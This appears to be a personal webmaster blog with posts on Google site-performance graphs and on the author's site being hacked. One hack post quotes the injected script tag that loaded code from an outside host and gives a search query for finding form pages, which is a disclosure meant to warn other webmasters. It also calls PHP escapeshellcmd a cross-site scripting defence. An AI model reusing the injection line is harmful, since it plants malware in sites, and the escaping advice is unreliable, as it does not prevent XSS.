Wednesday 16 December 2009

Site Performance in a Graph





The faster your site, the more sites that are slower...

According to this Graph (based on Google's Site Performance) almost all sites are slower when your performance is 0,3 seconds.

% slower sites = 105 - 18 * site performance

Update 05-04-2010: At a regular base, I upgrade this graph, normally, it are minor changes. However today it seems that there is a real change in the graph (1.0s goes from 89% slower to 93% slower). The mentioned formula is not valid anymore.

Update 12-04-2010 From lifehacker.com I learned that at 1.4s 87% of the sites are slower (this was originally 81%).

Friday 11 December 2009

Crawlstats versus Site Performance

Google introduced Site Performance. What is the difference between the Crawl Stats and the Site Performance. Crawl time is between the 0.2 and 0.4 seconds. The site is fast, except at the end of November. Strange. See this image ...



Wednesday 4 November 2009

How to prevent your website for malware

What the hell, how is it possible that I got malware at my website?

I have a theory. A nasty computer program infected the website. The way it is done seems Cross-site scripting to me.

Ok, why me? May be because the nasty computer program searches for webpages called webform*.htm for example with this search http://www.google.com/search?hl=en&q=allinurl:+webform.

Ok, why was it possible? Because I created my own forms? That should not be a problem (in theory).

I used the PHP strip-tags function, so there should be no problem (in theory). It was clear that that was not enough (in practice). So I added also the PHP escapeshellcmd function. That little nasty computer program should have used that, because almost all pages where infected at once. It simple could not be a manual edit action.

The most important protection for nasty computer programs is probably a Turing test via a Captcha (or a recaptcha). I think that this combination gives the most effective protection. Allthough nowadays I am not sure about that. Remember that I thought that strip-tags was enough ;-).

Tip: Test your site with the free Acunetix cross-site scripting scanner

WebHel

How to test if your site contains malware

A few weeks ago I discovered a problem as webmaster of the Helenahoeve (www.helenahoeve.nl). The site was hacked. Each page contains some extra code between the end head and the body tag.

The code was something like:
script src=http://mashaei.ir/AWStats/admin.php /script

I did not check it, but I think it is some nasty code. I discovered this code because I saw in the status bar that the browser was waiting for mashaei.ir. For what? Who is Mashaei? Well that is a simple question, take a look at: http://en.wikipedia.org/wiki/Esfandiar_Rahim_Mashaei but do not visit his site!

I removed all rubish, protected my site a litte more and watched my site more closely. I suggest that you ask Google for advise via  http://google.com/safebrowsing/diagnostic?site=mashaei.ir 

There are other sites, but they all state that mashaei.ir is okay. I think that that is not correct.
  1. McAfee's SiteAdvisor: http://www.siteadvisor.com/sites/mashaei.ir
  2. Finjan Vital Security: http://www.finjan.com/Content.aspx?id=574&surl=mashaei.ir
  3. Norton Safe Web: http://safeweb.norton.com/report/show?url=mashaei.ir&x=0&y=
There are luckily other ways to test your site for malware.
  1. If your site contains valid HTML, check at a regular base http://validator.w3.org/check?uri=www.mashaei.ir
  2. If you know which URL's are valid, check for strange browser requests with http://tools.pingdom.com/?url=www.mashaei.ir
  3. Let your site check by http://www.dasient.com/
WebHel